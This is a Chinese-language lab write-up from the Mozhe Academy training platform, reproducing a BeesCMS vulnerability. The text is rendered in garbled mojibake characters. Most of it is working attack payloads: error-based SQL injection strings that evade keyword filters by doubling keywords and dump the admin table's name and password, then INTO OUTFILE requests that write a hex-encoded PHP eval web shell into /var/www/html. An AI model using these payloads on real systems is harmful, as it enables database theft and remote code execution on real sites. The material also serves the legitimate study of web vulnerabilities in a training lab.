墨者學(xué)院
漏洞復(fù)現(xiàn)
進(jìn)入首頁,看到?jīng)]什么問題,用kail字典birb掃下路徑(發(fā)現(xiàn)管理頁面)
看到輸入框,嘗試sql注入,發(fā)現(xiàn)有注入漏洞
既然存在報(bào)錯(cuò)信息,我們就嘗試報(bào)錯(cuò)注入,經(jīng)過嘗試and也被過濾了,and用an and d代替,union用un union ion代替,select用selselectect代替:
報(bào)錯(cuò)注入
admin' an and d extractvalue(1,concat(0x7e,(select database()),0x7e))#
爆出數(shù)據(jù)庫名為dees
爆表名:
發(fā)現(xiàn)from、where、=也被過濾了,等號用like代替
admin’ an and d extractvalue(1,concat(0x7e,(selselectect table_name fro from m information_schema.tables wh where ere table_schema like ‘dees’ limit 0,1),0x7e))#
爆字段
admin' an and d extractvalue(1,concat(0x7e,(selselectect column_name fro from m information_schema.columns wh where ere table_name like 'bees_admin' limit 1,1),0x7e))#
修改為limit 2,1
爆值
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_name fro from m bees_admin limit 0,1),0x7e))#
admin’ an and d extractvalue(1,concat(0x7e,(selselectect admin_password fro from m bees_admin limit 0,1),0x7e))#
md5解密出來admin。
進(jìn)入后發(fā)現(xiàn)沒有什么可以動的東西,想起提示網(wǎng)站位于"/var/www/html/"目錄下。
上傳木馬
那么都不用拿到賬號密碼了。。。。
user=admin' un union ion selselectect 1,2,3,4,5 i into nto outoutfilefile '/var/www/html/shell.php&password=1&code=abd5&submit=true&submit.x=60&submit.y=23
測試文件上傳可
下面直接寫入一句話木馬:
user=admin' un union ion selselectect 1,<?php @eval($_REQUEST['ABC']);?>,3,4,5 i into nto outoutfilefile '/var/www/html/1.php'&password=12&code=f333&submit=true&submit.x=49&submit.y=30
發(fā)現(xiàn)并沒有<>被過濾了
轉(zhuǎn)成16進(jìn)制文章來源:http://www.zghlxwxcb.cn/news/detail-613873.html
user=admin' un union ion selselectect 1,0x3c3f70687020406576616c28245f524551554553545b27414243275d293b3f3e,3,4,5 i into nto outoutfilefile
'/var/www/html/123.php'#&password=12&code=f333&submit=true&submit.x=49&submit.y=30
連接成功文章來源地址http://www.zghlxwxcb.cn/news/detail-613873.html
到了這里,關(guān)于BeesCMS系統(tǒng)漏洞分析的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!